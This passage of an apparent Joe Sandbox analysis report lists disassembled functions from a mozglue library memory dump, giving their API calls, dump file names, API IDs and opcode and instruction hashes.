                                                                                                                                                                                                                                                                                        • Instruction ID: b66e5c6bad13fad089c54b9c3c27704874458323592a063f4434caad039d07f0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6da283f7a76d8d5b919327a3786961eafe96866f6c0511171e570d5951cd4019
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B512371A042568FCB01CF19C490A9AFBB5EF99300F19859DE8595F791D331ED06CBE0
                                                                                                                                                                                                                                                                                        Function 6C9C77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C77FA
                                                                                                                                                                                                                                                                                        • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C9C7829
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C9631A7), ref: 6C99CC45
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C9631A7), ref: 6C99CC4E
                                                                                                                                                                                                                                                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C9C789F
                                                                                                                                                                                                                                                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9C78CF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C964E5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C964E97
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9A3EBD,6C9A3EBD,00000000), ref: 6C9642A9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2525797420-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3ac145d0a82e15d89fdbc3a288ab12455608a5149450bbf0b8ea172577cf0736
                                                                                                                                                                                                                                                                                        • Instruction ID: cecb7a913daaa3761154ec008c29e106a4275629ebcb251de418c538bfdfe8ba
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ac145d0a82e15d89fdbc3a288ab12455608a5149450bbf0b8ea172577cf0736
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C419171A047469BD300DF29C48056AFBF4FFEA254F604A6DE4A987680DB30D559CB92
                                                                                                                                                                                                                                                                                        Function 6C9A6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9A82BC,?,?), ref: 6C9A649B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9A64A9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99FA80: GetCurrentThreadId.KERNEL32 ref: 6C99FA8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99FA80: AcquireSRWLockExclusive.KERNEL32(6C9EF448), ref: 6C99FA99
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9A653F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9A655A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f0d3ab8e1784937207eef3f6994bbbbc24d96fbaa0036f253e7603e89c3ef75d
                                                                                                                                                                                                                                                                                        • Instruction ID: 5bb3e00fefdcc33598867a9ff215f6eba394a3981c803a8c44895d20dab470ef
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0d3ab8e1784937207eef3f6994bbbbc24d96fbaa0036f253e7603e89c3ef75d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 773181B5A047059FD740CF14D88469EBBF4FF98314F10482DE85A97741D730E919CB92
                                                                                                                                                                                                                                                                                        Function 6C99FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C9BD019,?,?,?,?,?,00000000,?,6C9ADA31,00100000,?), ref: 6C99FFD3
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,6C9BD019,?,?,?,?,?,00000000,?,6C9ADA31,00100000,?,?), ref: 6C99FFF5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C9BD019,?,?,?,?,?,00000000,?,6C9ADA31,00100000,?), ref: 6C9A001B
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C9BD019,?,?,?,?,?,00000000,?,6C9ADA31,00100000,?,?), ref: 6C9A002A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 826125452-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 11547ef9570b59b362d869286ef39f70b267abfaabd803ffb6a49534e5d3e3e9
                                                                                                                                                                                                                                                                                        • Instruction ID: 9f2a68318919fe606da68b33717f06ac664957a5e69e71c841a9b1f70c56868c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11547ef9570b59b362d869286ef39f70b267abfaabd803ffb6a49534e5d3e3e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D210872A002165BD7189E78DC944AFF7BAEB993243290738E526D7780EB30ED1186D1
                                                                                                                                                                                                                                                                                        Function 6C97B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C97B4F5
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C97B502
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C97B542
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C97B578
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 79d489a35ddba773d0a4f855c95d5e953a08f385e82b22055424942d54ef4dac
                                                                                                                                                                                                                                                                                        • Instruction ID: 1ab6b58d286778ffc99e30e480bb00447efd41ddfcb153d2f1ff8fdcebadb254
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79d489a35ddba773d0a4f855c95d5e953a08f385e82b22055424942d54ef4dac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F411A231909B45C7D7228F29D804765B3B5FFEA318F24570AD84953E01EBB1E1C587A4
                                                                                                                                                                                                                                                                                        Function 6C9A3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C96F20E,?), ref: 6C9A3DF5
                                                                                                                                                                                                                                                                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C96F20E,00000000,?), ref: 6C9A3DFC
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9A3E06
                                                                                                                                                                                                                                                                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C9A3E0E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CC00: GetCurrentProcess.KERNEL32(?,?,6C9631A7), ref: 6C99CC0D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C9631A7), ref: 6C99CC16
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ad472ba168f7cfd12e8830b651220116205bac26859fbe8703c48d815e5eb901
                                                                                                                                                                                                                                                                                        • Instruction ID: 54eb3a362eace2290d51837a6783f950f547eaaad3b85e2db00bdf6721694c4b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad472ba168f7cfd12e8830b651220116205bac26859fbe8703c48d815e5eb901
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91F082715002087BDB00AB94DC41DAB372CEF6A628F154420FE0917700D635FD2586F7
                                                                                                                                                                                                                                                                                        Function 6C9B20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B20B7
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C99FBD1), ref: 6C9B20C0
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C99FBD1), ref: 6C9B20DA
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,6C99FBD1), ref: 6C9B20F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f727e96bf2340e9e46bbd956dc3b1bfecdff492dadf5f65ced6b2d6048f02f7e
                                                                                                                                                                                                                                                                                        • Instruction ID: 63094c13328ea731cb51faa8fb938ac23778cf4cab11566e861574b30edb5909
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f727e96bf2340e9e46bbd956dc3b1bfecdff492dadf5f65ced6b2d6048f02f7e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44E02B31604B14ABC3209F25D80854FB7FDFFAA314B10062AE50AD3B00D775F54A87D9
                                                                                                                                                                                                                                                                                        Function 6C9B85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C9B85D3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C9B8725
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                        • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                        • Opcode ID: ee220da6e311adb3fe5b62392a8fe42f3cb9eca716dd68517d5cccc048428ecd
                                                                                                                                                                                                                                                                                        • Instruction ID: cb8f3a64fba9c323e8cdaf06341787a0a935f6576d42b5ba4aaefbe2d8b7717a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee220da6e311adb3fe5b62392a8fe42f3cb9eca716dd68517d5cccc048428ecd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B5186B4A00646EFC709CF18C084B56BBF1BF5A318F18C19AD8596BB52C334E885CF96
                                                                                                                                                                                                                                                                                        Function 6C96BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C96BDEB
                                                                                                                                                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C96BE8F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: af173f5b1869ce60b1e5c0bcd86da1939d093934a404f02f31c75198519e60e7
                                                                                                                                                                                                                                                                                        • Instruction ID: 9ec3af14961b9fd0af8e3a3abf004745a32afd623f236c9ccf535832fc5003ae
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af173f5b1869ce60b1e5c0bcd86da1939d093934a404f02f31c75198519e60e7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F41E571909745CFD301CF39C491A5BB7F4AF9A348F004A1DF9856BA51E730D954DB82
                                                                                                                                                                                                                                                                                        Function 6C9A3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9A3D19
                                                                                                                                                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C9A3D6C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                                                        • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                        • Opcode ID: 132cb41fea635e89c82f4e0ccfb92eb556bd4b4fe28e476d9ac814cb376bacfb
                                                                                                                                                                                                                                                                                        • Instruction ID: 62306ddcb2d6a5cf1be03aefcc77bd02af3a56dd6c2b58df199af77f86c640c7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 132cb41fea635e89c82f4e0ccfb92eb556bd4b4fe28e476d9ac814cb376bacfb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06110436E08688D7DB008BA9C8144EDB775FFAA218B458218DC45A7612EB30E5C5C750
                                                                                                                                                                                                                                                                                        Function 6C974730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9744B2,6C9EE21C,6C9EF7F8), ref: 6C97473E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C97474A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                        • String ID: GetNtLoaderAPI
                                                                                                                                                                                                                                                                                        • API String ID: 1646373207-1628273567
                                                                                                                                                                                                                                                                                        • Opcode ID: 56922b1525815ed4297b5ccf76939983986cda1503baecaf55994f3ccb0b3340
                                                                                                                                                                                                                                                                                        • Instruction ID: 2e444408539cbe1cd787ebb58c1d12888fcd1cc08a52fe4f15d7faf6700a5e83
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56922b1525815ed4297b5ccf76939983986cda1503baecaf55994f3ccb0b3340
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18018C753093548FDF01AF6698846297BB9EF9F721B29006AE90ACB301CB74D801CFA1
                                                                                                                                                                                                                                                                                        Function 6C9C6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C9C6E22
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9C6E3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C9C6E1D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                        • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                        • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                        • Opcode ID: e23ff3514a28ee5fa86c4fae328746c4f4497a00e0017d4a2b8ce92d946103e1
                                                                                                                                                                                                                                                                                        • Instruction ID: 5ff03ee5c14f1aae06e2e6dec7bb61887dcb190dbf2658762f2112262dbf247d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e23ff3514a28ee5fa86c4fae328746c4f4497a00e0017d4a2b8ce92d946103e1
